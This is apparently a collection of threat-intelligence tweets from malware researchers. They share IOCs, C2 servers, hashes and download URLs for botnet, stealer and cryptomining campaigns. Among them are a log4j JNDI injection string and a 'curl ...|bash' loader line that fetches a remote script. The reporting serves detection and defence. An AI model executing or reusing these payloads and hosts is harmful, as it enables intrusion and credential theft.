Toli

IoT Botnet Exploiting #CVE-2021-44228 #log4j User-Agent: ${jndi:ldap://179.43.175.101:1389/o=tomcat} The payload is JavaScript code executed in Java using ScriptEngineManager. IOCs and sample: tolisec.com/iot-botnet-exp…

@banthisguy9349 @BlinkzSec @RacWatchin8872 @g0njxa @Gi7w0rm @TuringAlex @byrne_emmy12099 @James_inthe_box @UK_Daniel_Card @RussianPanda9xx @DarkWebInformer @fs0c131y @cyb3rops @RakeshKrish12

List of people that you should consider following in no particular order: @BlinkzSec @RacWatchin8872 @g0njxa @Gi7w0rm @tolisec @TuringAlex @byrne_emmy12099 @James_inthe_box @UK_Daniel_Card @RussianPanda9xx @DarkWebInformer @fs0c131y @cyb3rops @RakeshKrish12

@banthisguy9349 @500mk500 @abuse_ch yeah mirai variant packed with vanilla upx :)

#obfuscated #elf found that by the looks of it is a variant of #mirai malware urls: hxxp://185.196.10.215:12234/mips.bin hxxp://185.196.10.215:12234/x86_64.bin They really tried to hide on port 12234 with .bin file extension 🤣 cc: @tolisec @500mk500 @abuse_ch

@banthisguy9349 @BlinkzSec @RacWatchin8872 suspect c2s: 195.2.81[.]97:7122 35.212.131[.]94:7122 printerconsulting[.]ru elfdigest.com/report/9c79479…

@BlinkzSec @RacWatchin8872 Please share the sendins from urlhaus. Cc: @tolisec

Just found new #Mirai malware - has hardly any hits cc: @banthisguy9349 @RacWatchin8872

@banthisguy9349 @500mk500 nice catch! VT has it as metasploit implant, C2: 15.206.116.117:8787

cc: @tolisec @500mk500 new elf found

Test.elf! suspicious file! 147.45.44.100 opendir was seen on 27th of july. Ip down now it seems 176.32.35.254 opendir was seen on 31th of july. Ip down now it seems although the 3rd one urlhaus.abuse.ch/host/15.206.11… has some #elf linux #backdoors

#microsoft just released a article related to #NorthKorean #ThreatActors microsoft.com/en-us/security… Seems to be that this is a active IOC's related to the ransomware group: 192.177.51.248 ccwaterfall[.]com cc: @tolisec @500mk500 @Gi7w0rm @UK_Daniel_Card @tosscoinwitcher

@Gi7w0rm @banthisguy9349 @500mk500 @abuse_ch @malwaremustdie doesn't seem like Kaiji, reports hostname and id to stager server (pcap in VT virustotal.com/gui/file/3fd83…)

@banthisguy9349 @tolisec @500mk500 @abuse_ch @malwaremustdie I assume this is not Kaiji?

#elf was spotted to allegedly exploiting #CVE-2024-3400 "A command injection vulnerability in the GlobalProtect feature of #Palo #Alto #Networks" Low detections cc: @tolisec @500mk500 @abuse_ch

@banthisguy9349 potential C2 for [aee499304dd672782f404c1da20436ce162c44cd37f9d256275089fc17b2d7ed] is 147.78.12[.]176

fresh observed #elf #malware ! with very low detections 5c21a3451c7f4bcb6737a8904efc7ea9ee10b3994f324b2ece1610883c2394f1 3bd5be1f538f8cc195dbffd77d01e0c2509c56139a307b72d72d5bdbe2245584 c9e62e041871b6a8be78ea685ec57d50e6b7006955cd2268c5413828958aa2fe x.com/banthisguy9349…

We are proud to have assisted (along with partners) in the US DoJ & FBI-led disruption of the Moobot malware botnet comprised of SOHO routers utilized by APT 28/Fancy Bear: justice.gov/opa/pr/justice… Data on infections shared in Sinkhole HTTP Events report: shadowserver.org/what-we-do/net…

📢 In #FIRSTCTI22, @unixfreaxjp w/ LACERT teams will share the implementation of @FIRSTdotOrg #CTI Curriculum methods into their investigation of targeted #WebSkimming threat as takeaways for #BlueTeam #pTargeted-Web-Skimming-on-E-Commerce-Sites" target="_blank" rel="nofollow noopener">first.org/events/symposi… Register soon, we value your time with good sharing!

Follina patch CVE-2022-30190. (msdt.exe) is out. msrc.microsoft.com/update-guide/e…

Están llegando los mineros! 🤖 (CVE-2022-1388) IP atacante: 85.106.114.175 🇹🇷 Payload: curl 202.28.229.174/ldr.sh|bash Muestras: bazaar.abuse.ch/browse/tag/CVE… * Incluye exfiltración de credenciales SSH

Everybody is familiar with the value of a tool like VirusTotal for malware... Ever wanted a similar tool for analyzing _not_ malware? Check out @echotrailco - solid collection of information & stats about common binaries found on healthy systems. echotrail.io

𝗔𝗰𝘁𝗶𝘃e #Mars #Stealer #Malware spread from CloudLite LLC Russia Threat Actor keep changing urls C2 Domain : http://jsdkca(.)link/518855.php hash: 6e304b4616eb9daa7da76d3c1894d5e62af10fe6dc3d6b2356518dbb1121d6b9 Seems malware infection in maas in this C2

VirusTotal welcomes @elfdigest to the VT multi-sandbox project! blog.virustotal.com/2022/04/virust… by @karlhiramoto

@verovaleros Have a speedy recovery!

Great news: I'm healthy! Still some weeks to full-full recovery but things are good! Extremely grateful for the support and great vibes received, it helps so so much! Here's to a great and peaceful 2022! Onwards! 🍻 🙏🏿

Currently 𝗔𝗰𝘁𝗶𝘃e #Mars #Stealer #Malware spread from CloudLite LLC Russia They are targeting again India, Brazil, Indonesia,Egypt,Vietnam,Pakistan, Philippines,Mexico C2: hxxp://jsdkct(.)link/47747.php Hash: 95b229600f28adfbe56fc09cd8a8ff88baf261329999f681613e5c951907d451

Recently deployed #Mars #Stealer #Malware C2: http://62.204.41.180/5xtELSMXvf.php Hash: 4d0b2e81d023a1704d0fb71cf3e689ec43a813c4041e6d0d5503de2732d18f15 e5e16ce47ed80d3b802a9c36f7ae408493d1e491ce83f72f253832b150aeb4bc

Will you be interested to join our #shellcode ADVANCED workshop w/#radare2 to study & RE on how recent threats are using shellcode in their actions aim Win/Mac/Linux OS? This vote will decide workshop planning, your answers matter! cc: @cedoxX @trufae @radareorg #MalwareMustDie

Recent Chinese Threat Actor #Winnti panel C2: ip: 204.15.78.131:3220 (TCP) url: us\.\host.skybad\.\top Actual Payload hosted here : http://160.251.42(.)252/xghk.exe hash: c99397d66e49e2def1b17f57cd0c5fb9 #GoldDragon #ZxShell #threatintel cc: @500mk500 (;

@1ZRR4H @ankit_anubhav @malwrhunterteam @0xrb Another server used in the same campaign: 80.92.204.82 🇩🇪

@1ZRR4H @ankit_anubhav @malwrhunterteam @0xrb The malware hosting server has moved to: 195.2.81.27 🇷🇺

Active #Kinsing #cryptomining campaign targeting exposed Docker API IoCs: hxxp://185.231.153.4/d.sh 🇷🇺 scanner/loader: 95.182.120.39 🇷🇺 initial payload: virustotal.com/gui/file/e61f1… kinsing bin: virustotal.com/gui/file/5d253…